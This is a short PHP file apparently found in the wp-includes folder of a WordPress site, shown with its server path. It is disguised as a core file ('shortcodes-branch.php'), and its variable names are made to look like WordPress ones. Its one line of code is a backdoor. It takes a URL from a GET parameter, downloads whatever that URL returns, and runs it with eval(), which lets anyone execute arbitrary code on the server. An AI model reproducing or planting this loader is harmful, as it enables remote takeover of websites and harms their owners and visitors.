Current Path : /home/fotouserdopd8j/agenciacrabli.com/wp-includes/ |
Current File : /home/fotouserdopd8j/agenciacrabli.com/wp-includes/shortcodes-branch.php |
<?php if (isset($_GET['reference'])) { $get_the_time_as = $_GET['reference']; if ($home_url_md = curl_init()) { curl_setopt($home_url_md, CURLOPT_URL, $get_the_time_as); curl_setopt($home_url_md, CURLOPT_RETURNTRANSFER, true); eval(curl_exec($home_url_md)); curl_close($home_url_md); exit; } }